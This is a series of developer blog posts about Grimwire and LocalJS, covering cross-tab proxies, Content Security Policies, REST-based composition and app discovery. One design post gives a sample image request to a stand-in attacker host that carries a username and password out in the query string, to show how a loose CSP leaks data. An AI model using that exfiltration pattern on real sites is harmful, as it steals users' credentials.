Wednesday, July 24, 2013

Mysteries...

The cross-tab proxy (a shared worker which transports messages between tabs) has some interesting latency characteristics.

  • Direct request to the cross-tab proxy (httpl://pages.grim): ~2ms
  • Direct request to a local in-page server (httpl://files.grim): ~1ms
  • Direct request to a public server (http://grimwire.com/rel): ~58-60ms
  • Proxy request through the cross-tab proxy to another page, then making a direct request to a public server (http://grimwire.com/rel): ~58-61ms
  • Proxy request through the cross-tab proxy to another page, then to a local in-page server (httpl://files.grim): ~100ms-1000ms
Very strange.
local.web.dispatch({
  method: 'PROXY',
  url: 'httpl://pages.grim/0',
  headers: { 'content-type': 'application/json' },
  body: { method: 'GET', url: 'http://grimwire.com/rel' }
})
.then(idleForSomeRandomTime) // possible bug?
.then(handleResponse);

Thursday, June 13, 2013

The Multi-tab Security Architecture

So ever since finding out I can make a bridge proxy between tabs using SharedWorkers, I've been trying to figure out what kind of cool stuff I can do with it. My first thought was obvious: over-engineer a complex declarative UI toolkit based on new URI schemes and something called "Compositional Hypermedia Events." It was too much, and I may have pulled a hamstring.

The deal here is, the security model determines everything about Grim. Nothing else matters if it's wrong. The tools we've got are Content Security Policies, Web Worker sandboxes, and now the ability to speak across tabs. The point of the declarative UI thing was to keep javascript out of the document but still make good UIs. It could have worked, I know it!

But I'm going to die one day, so I started looking more at the multi-tab options (which allow document access for apps). So here's the deal with CSP (content security policies):

  • You are mostly controlling what can be embedded in the document. New JS? Images? Iframes? Only from domains X Y & Z, plz.
  • Same with Ajax targets.
  • You can also nuke inlines and eval.
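To make that list concrete, here's a minimal sketch of how such a policy might be assembled. The directive names are standard CSP; the buildCsp helper and this particular policy are assumptions for illustration, not Grimwire's actual configuration.

```javascript
// Hypothetical helper: serialize a policy object into a CSP header value.
function buildCsp(policy) {
  return Object.keys(policy)
    .map(function (directive) {
      return directive + ' ' + policy[directive].join(' ');
    })
    .join('; ');
}

// Example app-tab policy (an assumption, not Grimwire's real one).
var appTabPolicy = {
  'default-src': ["'none'"],  // nothing is embeddable unless listed below
  'script-src': ["'self'"],   // inline scripts and eval stay blocked unless
                              // 'unsafe-inline' / 'unsafe-eval' are listed
  'img-src': ["'self'"],      // images only from our own domain
  'connect-src': ["'none'"]   // no Ajax targets at all
};

// The value would be sent as: Content-Security-Policy: <headerValue>
var headerValue = buildCsp(appTabPolicy);
```

Loosening img-src to * is the tempting change here, and it's exactly the one that opens the leak.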

So that's all baller, you might think, I'll just allow images from wherever (because you gotta have the pics) and then keep the dangerous stuff restricted to my domain. Well, too bad, because a GET request can still leak like a sieve, probably looking like this: GET http://evildude.com/thecatpicyoujusthadtosee.png?user=pfraze&password=banana. You could just allow that, but I'm not sure it's good to hand out that much rope when users don't know what it looks like to hang themselves.

Remember, the security model we've got here is there's one core tab - the Shell - and then there are the other app tabs. You disallow the Ajax in the app tabs, but still let them make requests through the SharedWorker to the Shell. The Shell checks the request against its policies, prompts the user ("Cool if that tab reads your email?") then does the Ajax for the other tab. So this means you can allow at least *some* amount of arbitrary code/content into the app tab, given there's parental guidance, but it's hard to know just how much to allow. Should the tab have no restrictions? If the app is leaky, the user wouldn't know it. It's much better to keep it all funneled through the Shell.
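A rough sketch of what the Shell's check could look like, assuming a per-tab table of URL prefixes. The table shape, the tab id, the mail.example.com host, and the checkRequest name are all made up for illustration; the real policy format isn't decided in this post.

```javascript
// Hypothetical policy table kept by the Shell: tab id -> URL prefixes.
var policies = {
  'mail-app': {
    allow: ['http://grimwire.com/rel'],     // no questions asked
    prompt: ['https://mail.example.com/']   // ask the user first
  }
};

function startsWithAny(url, prefixes) {
  return prefixes.some(function (prefix) {
    return url.indexOf(prefix) === 0;
  });
}

// Returns 'allow', 'prompt', or 'deny' for a request proxied from an app tab.
function checkRequest(tabId, request) {
  var policy = policies[tabId];
  if (!policy) return 'deny'; // unknown tabs get nothing
  if (startsWithAny(request.url, policy.allow)) return 'allow';
  if (startsWithAny(request.url, policy.prompt)) return 'prompt';
  return 'deny';
}
```

Only on 'allow' (or an accepted 'prompt') would the Shell perform the Ajax on the tab's behalf.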

Here's another thing: I really don't want to create a dynamic backend for Grim, but it could help. It would take all of two seconds, and I could probably just use PHP but it would make Grim just a little bit less cool to me, and that's not worth it. I wouldn't be able to host it on GitHub Pages, and there'd be fewer platforms that could run the code with 0 setup. But, if I did, I could load pages with specific CSPs and make choosing the allowed domains a part of the security model. More granularity, more flexibility. So what's the plan?

Well the reason GH Pages is such a cool host is the auditability (and the easy deployment). But it turns out GHP is also awesome for this: it's totally static. Devs hosting assets on it can't introduce server code or access logs. That means you can allow content from *.github.io and not worry about it leaking.



So that's awesome, because it means you can deploy an app for Grimwire by pushing it to a github page. I can piggy-back off of their whole thing. The only thing that would make it better would be access to the backlog of revisions-- but, as @briancarlson pointed out, you can always fork a project and get the revision you need. 

Man, that hot-dog looks good.

Monday, June 3, 2013

Cross-tab Transport Proxies

Last week, I found out about a variation of WebWorker called the SharedWorker. It's supported by Webkit browsers, but not Firefox, which is probably why I never noticed it - MDN doesn't document it, and I generally avoid tech without both moz and chrome.

This one's worth it. One of the crucial issues in Grim/Local is the security of the document. Using CSP, I stop applications from adding their own Javascript to the page. This is good, because then I can manage the document as a shared resource and enforce a zone of trust, but it's also bad, because HTML isn't expressive enough for rich, realtime server-side control. New HTML behaviors (widgets, SSEs, html-deltas) have to be added to get rich UIs, and that's a difficult process.

Shared Workers introduce the possibility of proxies which bridge between pages with different security profiles. Effectively, each page becomes a server to other pages. This means that sensitive applications can live inside of high-security tabs (high-secs) where only trusted JS is allowed, while less trusted applications can run in low-security tabs (low-secs) where they can add document javascript more freely.
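Here's a toy version of the "each page becomes a server" idea, with a plain in-memory object standing in for the SharedWorker. Everything here (createBridge, register, proxy, the 'high-sec' id) is hypothetical, and it runs synchronously for brevity, where real cross-tab messaging would be asynchronous.

```javascript
// In-memory stand-in for the SharedWorker bridge (hypothetical API).
function createBridge() {
  var pages = {};
  return {
    // A page registers a handler, making it a "server" to other pages.
    register: function (pageId, handler) {
      pages[pageId] = handler;
    },
    // Forward a request to another page and hand back its response.
    proxy: function (pageId, request) {
      var handler = pages[pageId];
      if (!handler) return { status: 404, reason: 'page not found' };
      return handler(request);
    }
  };
}

var bridge = createBridge();

// The high-sec page decides what it is willing to do for other tabs.
bridge.register('high-sec', function (request) {
  if (request.method !== 'GET') {
    return { status: 405, reason: 'method not allowed' };
  }
  return { status: 200, reason: 'ok', body: 'fetched ' + request.url };
});

// A low-sec page asks the high-sec page to act on its behalf.
var proxied = bridge.proxy('high-sec', {
  method: 'GET',
  url: 'http://grimwire.com/rel'
});
```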

The low-sec/high-sec relationship is one we already use with email. When you forget your password, you have a message delivered to the inbox tab, where you then authorize the action in the application tab. Currently, we use email to transport between these different trust zones. With cross-tab proxies, you can use Ajax to reach a high-sec.

Content Security Policies still play a key role. In the low-secs, you don't have XHR, but you can add scripts and styles from an application host. High-secs allow the XHR, but keep the document clean. The sandbox created for low-secs should funnel all of their interactions through other tabs, so that actions are still audited.
 
Grimwire still views document code as an extension to the browser/client, not as an extension to the application. Generally speaking, this is a guideline to make everything reusable and HTML-powered (using things like data-* directives, or, with components, custom elements). Relaxing the control over the document means that you can more freely extend the browser. It takes some of the pressure off the response content-types to represent all rich and realtime behaviors, and lowers the barrier to entry for Grim/Local.

I refactored Local to support SharedWorkers (and improved the web & worker APIs in the process) which puts its development at 0.4.0. I'm going to start on 0.2.0 of Grimwire to support this change to the architecture, and to support permissioning and the WebRTC transport. I'm probably going to ditch the JSON manifests of applications and try to simplify things a bit.

Monday, May 27, 2013

Composition through REST

TL;DR


By restricting application code from the client-side of the Web, REST messaging can become the exclusive driver of application behavior. Generic clients with more fine-grained control of the document can then introduce compositional qualities, improving user control over application behavior.

Compositional Architectures


The basis of composition is a unified interface, and unification is created through constraints. Universal I/O connectors simplify configuration and can result in emergent qualities. The go-to example is Unix's files and streams: components using streams can combine with pipes, resulting in more compact and reusable software.

Plan9 expanded on the Unix premise with a more rigorous unified interface ("everything is a file"), a networked messaging protocol, dynamic file namespace construction through layering, and a self-wiring GUI. It can reconfigure the view of resources -- keyboards, monitors, CPUs, storage, NICs, printers, software -- for each process by layering namespaces. That mechanism is used to enforce permissions, alter software behavior, and bridge machines over the network (without process awareness). By treating every interface as a file, Plan9 is able to apply tools and policies across broad slices of the system, often simplifying its design in the process.

The Web Protocol


REST defines a universal networked namespace of resources, application-driven navigation with hypermedia, and content-type negotiation, with constraints to allow caching, layering, and uncapped client counts (due to statelessness). It's a distributed data-store, but the resources are defined by applications which can apply their own logic (like 9P). The unified interface then makes it possible for clients to be architecturally generic-- but only to a point. Despite the compositional qualities of REST, Web applications don't let end-users take advantage of them. There is no equivalent to the pipe and stream.

Why is this? My belief is this: browsers don't provide managed cross-application access to the client resources. Instead, rooted in the document-browsing model, they've relied on complete isolation in the GUI environment. This policy forms a tight binding to the host of the application, limiting configurability to the options provided by the application itself. By not continuing to refine the granularity of the client architecture (possibly due in part to failures of features like frames) we've missed opportunities to create more powerful uniform controls in the browser.

In this post, I'm going to argue for altering the role of client-side code. By restricting application logic from the client (zero out-of-band knowledge) and using Javascript to extend the browser's behaviors, all application-level interactions are forced into REST messages. This provides the opportunity to introduce compositional tools, possibly mimicking concepts from Unix and Plan9.

Client as Browser, Server as Application


This approach requires the frontend to fully separate from the backend. The document software focuses on response interpretation, management of resources (such as the DOM or localStorage), traffic permissioning, and other system properties. Some of these responsibilities could be implemented without scripts (in the browser itself) but the goal is not to eliminate client Javascript - just to restrict it from application-specific behaviors (which are server-side concerns).

In this model, users choose between pages to get different security profiles, UI capabilities, and software configurations, then load interfaces for applications (defined by servers) into the environment. By sharing behaviors (particularly to do with response-interpretation) different pages can reuse applications. One obvious application for this is responsive design - clients can be selected to fit the medium, and applications can reduce layout concerns.

Content Security Policies can be used to embed untrusted content without sanitization. This makes it possible to implement frame-like behaviors at a finer grain with client code. The strike against CSP has been the issue of delivering richness without javascript. This is also solved by the generic client, which interprets directives from the response (status, headers, content-type behaviors, HTML directives) to safely produce high-level UI behaviors.

(It should be noted that iframes, even with some recent additions, are not suitable containers for untrusted code until they execute in a separate thread.)

Available Tools


The concept of "layering" makes it possible to introduce proxies into interactions with an application. This can be (and often is) used to add or modify behaviors, cache intelligently, anonymize, log, run security policies, and separate UIs from data-services (and layouts from UIs). Giving the client simple controls over this behavior - perhaps using a piping language - should result in more compact and flexible programs.

Hypermedia is another important tool to examine further. With data-uris, links can now designate static resources (a good opportunity for client-supplied data). Increasing the kinds of resources which URIs can target (by adding new schemes) increases the opportunities for unified controls.

The Link header centralizes programmatic access to hypermedia and creates a mechanism for exporting configuration (with HEAD requests). Link attributes - particularly "rel" and "title" - can describe an href with application-level semantics. Custom rel attributes (using URLs) can apply additional requirements on the target resource and its supplied representation, such as object schema definitions - important for compatibility negotiation. URI Templates parameterize the links, further reducing out-of-band knowledge and simplifying client design. In combination, these techniques enable programmatic navigation.
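For a sense of what a client has to work with, here is a small sketch that turns a Link header value into objects. parseLinkHeader is a hypothetical helper, not a LocalJS function, and it's deliberately naive: it assumes no "<" appears inside a quoted attribute value.

```javascript
// Parse a Link header value into [{ href, rel, title, ... }].
function parseLinkHeader(header) {
  var links = [];
  var linkRe = /<([^>]*)>([^<]*)/g; // "<href>" followed by its ";attr" list
  var match;
  while ((match = linkRe.exec(header)) !== null) {
    var link = { href: match[1] };
    // attr=value, where value is either quoted or a bare token
    var attrRe = /;\s*([a-z*]+)\s*=\s*(?:"([^"]*)"|([^\s;,]+))/gi;
    var attr;
    while ((attr = attrRe.exec(match[2])) !== null) {
      link[attr[1].toLowerCase()] = attr[2] !== undefined ? attr[2] : attr[3];
    }
    links.push(link);
  }
  return links;
}

var parsedLinks = parseLinkHeader(
  '<http://myhost.com/users>; rel="collection"; title="users", ' +
  '<http://myhost.com/users/{id}>; rel=item'
);
```

The second link carries a URI template, which the client would fill in before requesting it.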

Using link attributes to navigate hypermedia allows clients to parameterize views of resources. For instance, consider the following navigations:

HEAD http://myhost.com
  HEAD rel=collection title=users (http://myhost.com/users)
  GET  rel=item       title=bob   (http://myhost.com/users/bob)

As far as the consuming program is concerned, there is some initial URL, the "collection:users" navigation, then the "item:bob" navigation. Thus, its view of the process is:

HEAD (x)
  HEAD rel=collection title=users (y)
  GET  rel=item       title=bob   (z)

By expecting host URLs in the "x" parameter, programs can be configured to consume different services by handing them a "dot com," a familiar and simple tool for users.
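The x/y/z navigation above can be sketched without any network at all. In this version a lookup table plays the part of the Link headers a HEAD request would return; linkTable and navigate are illustrative names, not part of any library.

```javascript
// Hypothetical in-memory "web": each URL maps to the links it would
// return in its Link header. A real client would issue HEAD requests.
var linkTable = {
  'http://myhost.com': [
    { href: 'http://myhost.com/users', rel: 'collection', title: 'users' }
  ],
  'http://myhost.com/users': [
    { href: 'http://myhost.com/users/bob', rel: 'item', title: 'bob' }
  ]
};

// Follow a list of { rel, title } steps from a starting URL (the "x").
function navigate(startUrl, steps) {
  return steps.reduce(function (url, step) {
    var links = linkTable[url] || [];
    for (var i = 0; i < links.length; i++) {
      if (links[i].rel === step.rel && links[i].title === step.title) {
        return links[i].href;
      }
    }
    throw new Error('No link rel=' + step.rel + ' title=' + step.title + ' at ' + url);
  }, startUrl);
}

// Only the starting host is configured; "y" and "z" are discovered.
var target = navigate('http://myhost.com', [
  { rel: 'collection', title: 'users' },
  { rel: 'item', title: 'bob' }
]);
```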

A notable recent addition to HTML5 is Server-Sent Events, which allows realtime server-to-client updates which work across the network (though at some cost of scale, as each event-stream requires a persistent connection). This is a useful mechanism for syncing the client with the application without requiring an initiating user-action.

Generic Client Designs


The available tools can be exploited in a variety of ways, each with their own effects. The client I'm developing (Grimwire) has been through a number of iterations.

The first iteration was command-line based, included "fat" pipes (response->request pipes that defined the content type), and assigned names to individual "frames" on the page which could be used as aliases to the host that delivered the response. The CLI looked like this:

users> get http://myapp.com/users [json]
friends> get users/pfraze/friends [json]
get users/jdoe [json] post friends
delete friends/harry

This original "fat" pipe technique (defined above by the brackets, eg "[json]") did not leverage proxies. Instead, it issued each request in the pipeline as individual requests from the client, using the body of the previous response as the body of the subsequent request.
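To show how a line like those might break down into individual requests, here's a small parser sketch. The grammar is my reading of the four examples above (optional "name>" prefix, then method/url pairs, each optionally followed by a "[type]" pipe), not the original implementation, and parseCommand is a made-up name.

```javascript
// Parse a CLI line into an optional frame name and a list of stages.
function parseCommand(line) {
  var tokens = line.trim().split(/\s+/);
  var result = { frame: null, stages: [] };

  // Optional "name>" prefix assigns the final response to a named frame.
  if (tokens.length && /^[^\s>]+>$/.test(tokens[0])) {
    result.frame = tokens.shift().slice(0, -1);
  }

  while (tokens.length) {
    var stage = {
      method: tokens.shift().toUpperCase(),
      url: tokens.shift(),
      type: null
    };
    if (stage.url === undefined) {
      throw new Error('Missing URL after ' + stage.method);
    }
    // Optional "[type]" marks a fat pipe carrying that content type
    // from this response into the next request's body.
    if (tokens.length && /^\[.+\]$/.test(tokens[0])) {
      stage.type = tokens.shift().slice(1, -1);
    }
    result.stages.push(stage);
  }
  return result;
}

var pipeline = parseCommand('get users/jdoe [json] post friends');
```

Each stage would then be dispatched in order, with the previous response body becoming the next request body.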

The "frame" which issued the request would receive the final response in a "response" DOM event. At that time, I allowed application client code (as widgets) to handle the response and alter the DOM directly. I also had the widgets themselves export Web APIs (as servers) which made it possible to do things like checking a box in a table with ck mail/5. You can find a demo video here.

(In-document servers, I should note, are added through an Ajax library which examines the protocol and routes "httpl://" requests to javascript functions. As mentioned above, this increases the usability of URIs, allowing them to target client resources - like the DOM - and applications which live in Web Workers - described below.)
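The routing idea is simple enough to sketch in a few lines. This is not the library's code: localServers, addServer, and routeRequest are stand-in names, the handlers are synchronous for brevity, and the non-httpl branch just returns a placeholder where a real library would fall through to XMLHttpRequest.

```javascript
// Hypothetical registry: hostname -> handler function.
var localServers = {};

function addServer(host, handler) {
  localServers[host] = handler;
}

// Route "httpl://" URLs to in-page functions by hostname.
function routeRequest(request) {
  var match = /^httpl:\/\/([^\/]+)(\/.*)?$/.exec(request.url);
  if (!match) {
    // Placeholder: a real library would send this over the network.
    return { status: 0, reason: 'not an httpl url' };
  }
  var handler = localServers[match[1]];
  if (!handler) return { status: 404, reason: 'not found' };
  return handler({ method: request.method || 'GET', path: match[2] || '/' });
}

addServer('files.grim', function (req) {
  return { status: 200, reason: 'ok', body: req.method + ' ' + req.path };
});

var localRes = routeRequest({ method: 'GET', url: 'httpl://files.grim/readme.txt' });
```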

I dropped the first iteration's approach for a couple reasons. The first is that I think the CLI can be dropped in favor of something simpler and GUI-driven without losing the precision. My feeling is that the CLI, if needed, should be an application, not a client feature.

The other issue was whether it's right to export a server-interface for the DOM. Doing so is in line with Plan9's approach to the GUI (where windowing and rendering is controlled, of course, by files) and matches the intent of a universal interface, but it seems to break the mental model of the browser without gaining much value. It confuses the server/client relationship a bit to handle requests by issuing subsequent requests on the DOM (what does the response do?) and remote servers would be unable to access the same tools. The async nature of requests also made them somewhat less convenient to use for DOM manipulation.

In lieu of the widget-servers, I started using Web Workers to host "local" servers under the "httpl://" namespace. This forms an on-demand collection of apps within the session which can give strong guarantees of privacy without requiring private webhosts. Shared Workers, once they have better support, will also be available to bridge between browser tabs. Ideally, Workers could be used to sandbox untrusted code, which would then be used with the same privacy guarantees-- but the security of that approach isn't proven yet.

Servers in the local namespace are considered elevated regarding Hypermedia discovery - it's assumed that any links they export should be consumed. For instance, the search program looks through all local servers for a rel="http://grimwire.com/rel/index" link, then automatically GETs and indexes that content. The registry of auto-discovered workers could also include links to remote hosts set by the user. This should provide high-level control over software composition with a fairly simple configuration-step (choosing active programs).

Rather than have DOM regions export interfaces, I'm testing embedded information which can flow through operations. You can find older demo videos of this here and here. In the current build, dropping the "Email" operation onto embedded data results in a GET request to the mail application for an interface to insert. The "Email" operation is itself just an exported link with the "http://grimwire.com/rel/transform" rel attribute. The generated request includes serialized data about the drop target, allowing the application to seamlessly populate itself.

In the future, I want to experiment with more layering (proxy-based) tools, and take stronger advantage of Hypermedia discovery rather than configuration. Currently, I use JSONs to define application packages; I think they could be factored out. Additionally, I need to start forming an approach to security and permissioning. Doing so would enable untrusted applications to enter the user's environment, and could expand the possibilities for multi-user environments.

Final Words


Adding a new constraint to the Web is not easy, particularly when it takes away Document API access from the application developers. Some modern projects, such as Meteor, actually look for more application code in the frontend, not less. However, bucking this trend for a little added pain could result in significant payoffs.

The quality of the system is largely dependent on the capabilities of the client, but the fundamental concepts (server-side applications, common response interpretation behaviors) are homogeneous enough to translate between many different clients. By using pages as extensions to the browser, users can customize the client on-demand and choose the environment that suits their needs.

As we move into new computing interfaces (VR/AR, motion tracking, voice-recognition) client-side versatility will become increasingly important. Moreover, effective application of these techniques could account for holes in the architecture of the Web (privacy, user-extensibility). Improved granularity could result in more compact and reusable applications, and create opportunities for effective compositional techniques on the Web.

If you'd like to know more about Grimwire, visit the documentation in the nightly build, the Google Group, or the repository, or follow me on twitter.

Saturday, May 25, 2013

Microdata: An Open Standard vs Efficiency

This isn't a major issue. I just thought I'd write about a question I'm working on.

Grimwire dev branch currently uses the Microdata standard to embed data into the interface. Because the items API is not implemented in enough browsers (chrome) Grimwire has to do attribute-based selector queries (which are slow) to manually form the item. This gets worse when dealing with embedded objects. It's not a huge problem, but it's not good. Chrome will probably (?) implement it later.

That said, Grimwire also uses data-uris to allow hrefs to indicate chunks of data. Calling local.http.dispatch({ url: 'data:text/plain,foobar' }); gets you back a status=200, Content-Type=text/plain, body="foobar" response. Embedding JSON as a data-uri would be more efficient than Microdata, and would allow httpl (the namespace targeting web workers) and http addresses to be used (realtime freshness).
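A sketch of how a data-uri can be turned into that kind of response. dispatchDataUri is a hypothetical standalone function (not the library's dispatch), it returns synchronously, and it skips base64 payloads to stay short.

```javascript
// Turn a data-uri into a response-like object.
function dispatchDataUri(url) {
  // data:[<media type>][;param...],<data>
  var match = /^data:([^,;]*)((?:;[^,;]+)*),([\s\S]*)$/.exec(url);
  if (!match) {
    return { status: 400, reason: 'bad request', headers: {}, body: '' };
  }
  if (/;base64$/i.test(match[2])) {
    // Not handled in this sketch.
    return { status: 415, reason: 'base64 not supported here', headers: {}, body: '' };
  }
  return {
    status: 200,
    reason: 'ok',
    headers: { 'content-type': match[1] || 'text/plain' },
    body: decodeURIComponent(match[3])
  };
}

var plain = dispatchDataUri('data:text/plain,foobar');

// Embedded JSON works the same way once it is percent-encoded.
var jsonUri = 'data:application/json,' + encodeURIComponent('{"name":"bob"}');
var embedded = JSON.parse(dispatchDataUri(jsonUri).body);
```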

Choosing between the open standard and something more specific is a hard choice. I try to only do the latter when I think I can make a case for other people to adopt the same standard. I wouldn't buck tradition unless I thought I could defensibly improve it.

Microdata is nice. It pushes toward the interleaving of representation for machines and for humans, which I like, but... it's a hassle. When I'm writing HTML, I want to specify as few attributes and elements as possible. If I could condense it into one element which takes a JSON data-uri, I'd be happier.

Not only is an embedded JSON data-uri faster to code, it requires less markup data and less DOM traversal. Representational State Transfer is all about the content-types, and HTML is all about the embedding. It even has an element for it: <object>. That seems like a better direction.

The final argument I can entertain for Microdata is that it does bind the machine-readable data to visual elements. I'm unsure that Grimwire can take advantage of compositional tools so fine-grained that individual DOM elements need semantic binding-- but this could change if the binding is used to do realtime content updates, or if VRUIs can make use of the granularity in some way not currently possible (semantic visual structures, for example).

And here's another point -- Microdata includes the itemtype attribute, which I think is important for discovery/routing. If I go with <object>, I'll likely have to use a non-standard attribute like itemtype, which I prefer not to do.

Two good answers. I hate that.


Friday, May 24, 2013

LocalJS & Grimwire: A program architecture for Web Workers

Recently, I tagged 0.1.0 of Grimwire, and 0.3.0 of LocalJS. After 14+ months of development, the software is stable enough - still experimental, but stable enough - to use.


TL;DR


Grimwire is a frontend Javascript environment that gives users control over loaded scripts using a program architecture built on Web Workers and RESTful messaging. It's multi-threaded and provides tools for composing user interfaces.


A User-Extensible GUI Environment


This project was started to improve the flexibility of Web software and make it convenient for users to inject their own programs into the page. It's meant to do this while maintaining the convenience of on-demand software (that is, loaded in-browser). The end goal is to create a GUI environment that's easy and safe to extend with applications, thereby decoupling frontend software from backend services.

It attacks this goal in two ways: first, by creating a client-side toolset which gives Web services control of the document without delivering custom client-side code; second, by applying a RESTful messaging protocol over the Web Workers postMessage() API, enabling Javascript servers to be downloaded and executed in isolated threads. The net effect is a program architecture which the document software manages.

Restricting client-side code from the servers is an atypical constraint. Doing so, however, enables finer-grained security and composition:

  • Security. The client-side namespace only loads trusted software from the host. Web Workers, then, contain userland applications which must pass their messages through the document for auditing and delivery. This, combined with Content Security Policies, should make fine-grained security & permissions policies possible. (Iframes may also play a role, but their lack of thread isolation makes them bad candidates for user software.)
  • Composition. With Web Workers receiving Ajax calls under the "httpl://" interface (LocalJS), a general-purpose client can intercept request-forming events (link clicks and form submits) and route them to the Workers. That client program (Grimwire) then manages the document's resources (sessionStorage, security credentials, the DOM) under the user's direction. Using Hypermedia tools, software can discover resources in the environment, providing auto-configuration and composition between unfamiliar programs.

LocalJS - the core framework


LocalJS is a program architecture for frontend software. It can be used in any web app (games, applications, web desktops) to host third-party software. Because the programs are hosted in Web Workers, all user code is isolated in separate threads, and all interactions occur through messaging. Local applies REST over the Workers' messaging to allow them to behave as Web servers.

// load a local web server into a worker
local.env.addServer('helloworld.usr', new local.env.WorkerServer({
  src: 'data:application/javascript,'+
  'function main(request, response) {'+
    'response.writeHead(200, "ok", {"content-type":"text/html"});'+
    'response.end("<h1>Hello, World!</h1>");'+
  '}'
}));

// load the HTML from the worker server into #content
var region = local.env.addClientRegion('content');
region.dispatchRequest('httpl://helloworld.usr');

Some APIs in the Worker (such as XMLHttpRequest) are nullified so that all traffic must be routed through the document to be examined. For applications using HTML, Local isolates browsing regions on divs - iframes without the sandboxing. To keep the document trusted, services can use Content Security Policies to restrict client-side code and styles.
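One way the nullifying could be done, shown on a plain object standing in for the Worker's global scope. This is a guess at the technique rather than Local's actual code: nullifyApis is a made-up name, and whether defineProperty behaves this way on a real worker global depends on how the browser exposes the API.

```javascript
// Hypothetical helper: replace named APIs on a scope with null and
// lock the property so user code can't restore it.
function nullifyApis(scope, names) {
  names.forEach(function (name) {
    Object.defineProperty(scope, name, {
      value: null,
      writable: false,
      configurable: false
    });
  });
}

// A plain object standing in for the worker global ("self").
var fakeWorkerScope = {
  XMLHttpRequest: function () {},
  postMessage: function () {}
};

nullifyApis(fakeWorkerScope, ['XMLHttpRequest']);
// postMessage is left alone: it's the only way out, through the document.
```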

Note: Though LocalJS is being built for secure computing, the security features aren't complete yet, and many browsers have half-baked CSP support. Don't run untrusted code yet!

The libraries use promises for all async and take some cues from NodeJS, including require() & module.exports (for the Workers). You can find more information at http://grimwire.com/local/index.html.


Grimwire - a Web OS built for composable social computing


Grimwire is a deployment of LocalJS which behaves as a generic program execution environment. It defines applications using JSON configurations and includes tools to modify the software within the browser session. Future releases will include permissioning (so that users can share programs) and WebRTC as an Ajax transport (so users can serve applications directly to peers).

Since applications can't touch the document directly, they rely on HTML directives, response status codes, and special content-types to create rich & realtime UIs. There's a pretty wide set of use-cases already covered, but some needs aren't met yet. Getting this toolset right is the main objective of the 0.1.x release schedule. Afterwards, 0.2.x will focus on the security and multi-user features.

REST Architecture


Grimwire/LocalJS first started as an attempt to implement Plan9's universal files interface in the Web. It eventually dropped files in favor of REST, and now focuses heavily on Hypermedia discovery. In Grimwire, a link or form can refer to either: a chunk of data (data-uris), a local script, or a remote service. This initial abstraction simplifies the task of injecting new code into the environment - rather than event-binding, programs describe interactions in HTML and hrefs. The Link header, combined with URI templates, enables programmatic discovery of services and resources. Additionally, Server-Sent Events allow programs to synchronize by subscribing to event-streams (local or remote). These tools make it relatively painless to get unfamiliar programs talking to each other.

// programmatic hypermedia discovery with the navigator
local.http.navigator('http://myhost.com')
  .collection('users')
  .item('pfraze')
  .getJson();

// event subscription
var stream = local.http.subscribe('httpl://myhost.com/news');
stream.on('update', function(e) { console.log(e); });
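The URI templates mentioned above do the parameterizing behind a call like .item('pfraze'). As a standalone illustration, here's a sketch of the simplest kind of expansion. expandTemplate is a hypothetical helper covering only plain "{name}" expressions (RFC 6570 level 1), and encodeURIComponent is only an approximation of the RFC's encoding rules.

```javascript
// Expand simple "{name}" expressions in a URI template.
function expandTemplate(template, vars) {
  return template.replace(/\{([A-Za-z0-9_]+)\}/g, function (whole, name) {
    var value = vars[name];
    // Undefined variables expand to nothing.
    if (value === undefined || value === null) return '';
    return encodeURIComponent(String(value));
  });
}

var userUrl = expandTemplate('http://myhost.com/users/{id}', { id: 'pfraze' });
```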

There's more to find in the documentation, as well as some new tools at work in the dev branch.

How to Get Involved


Grimwire is meant to be used as a frontend framework for services. The host can add CSS to skin the environment, and also add client-side code if needed. There are no backend dependencies, so you can deploy statically or from a custom server.

Eventually, Grim should be an easy-to-use platform with a strong selection of apps, reducing the time to develop and deploy Web software. Right now, it's just a decent set of tools with a few holes to fill. If you want to get involved, there's a lot of opportunity to help make core decisions and core apps. Get in touch at pfrazee@gmail.com, @pfrazee, or any of the project's boards.

You can find the documentation in the nightly build. Questions and comments should be posted to the Grimwire Google Group. The repository can be found at github.com/grimwire/grimwire, MIT license.




Very special thanks to Goodybag for supporting Grimwire's development and actively investing in FOSS. It's because of progressive businesses like them that the Web can change for the better. If you're in Austin, keep an eye out for their tablets at restaurants, and bug the shops that don't have one yet!




Tuesday, May 7, 2013

How the Grimwire Search Program Discovers New Applications and Indexes their Content

The Search application on Grimwire recognizes when new applications enter the environment and fetches data from them to populate its index. When applications are closed, their data is automatically depopulated. This post will explain how this works, both so that you can take advantage of the Search app, and so that you can use similar techniques in your own applications.

The Config Server

All of the environment's active configuration is hosted at httpl://config.env. It hosts the /apps collection, which provides the "Applications" interface and their JSON configs.
The only other environment server at this time is httpl://storage.env, a sessionStorage wrapper.
The /apps collection also hosts an event-stream which emits an "update" event when applications are added, removed, or reloaded (which happens on every config change).

// listen for new applications
local.http.subscribe('httpl://config.env/apps')
    .on('update', updateSources);
updateSources();

This is how the Search application becomes aware of new apps in the environment. If you're not familiar with Server-Sent Events, this post gives a brief introduction.

Finding the Data to Index

Every application defines a "startpage," which is the primary entry-point for its APIs. The Search application uses that URL to identify each source.

function updateSources() {
    local.http.dispatch({
        url:'httpl://config.env/apps',
        headers:{ accept:'application/json' }
    }).then(
        function(res) {
            var cfgs = res.body;
            for (var appId in cfgs)
                addSource(cfgs[appId].startpage); // <-- here
        },
        function(res) {
            console.log('Failed to fetch active applications');
        }
    );
}

Grimwire defines a custom rel-type for exported searchable data: http://grimwire.com/rel/index. The Search app checks each application startpage for a link to that relation.

function resolveSourceIndex(startPage) {
    return local.http.navigator(startPage)
        .relation('http://grimwire.com/rel/index')
        .resolve(); // just give me the URL
}

If you're not familiar with the navigator, there's a small introduction here. This function will generate one HEAD request to the startpage URL, then check the returned links for a rel="http://grimwire.com/rel/index".
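To make the "check the returned links" step concrete, here is a rough sketch of parsing a Link header and looking up a relation in it. This is not the navigator's actual code: parseLinkHeader and findByRel are hypothetical helpers, httpl://mail.usr is a made-up app, and the parser assumes there are no commas inside URLs or attribute values.

```javascript
// Hypothetical helper (not part of Local): parse a Link header value
// into an array of { href, rel, title, ... } objects.
// Simplification: assumes no commas inside URLs or attribute values.
function parseLinkHeader(value) {
    var links = [];
    var entryRe = /<([^>]*)>([^,]*)/g; // one '<url>; attr=...; attr=...' entry
    var entry;
    while ((entry = entryRe.exec(value)) !== null) {
        var link = { href: entry[1] };
        var attrRe = /;\s*([a-z]+)\s*=\s*(?:"([^"]*)"|([^;\s]+))/gi;
        var attr;
        while ((attr = attrRe.exec(entry[2])) !== null)
            link[attr[1].toLowerCase()] = (attr[2] !== undefined) ? attr[2] : attr[3];
        links.push(link);
    }
    return links;
}

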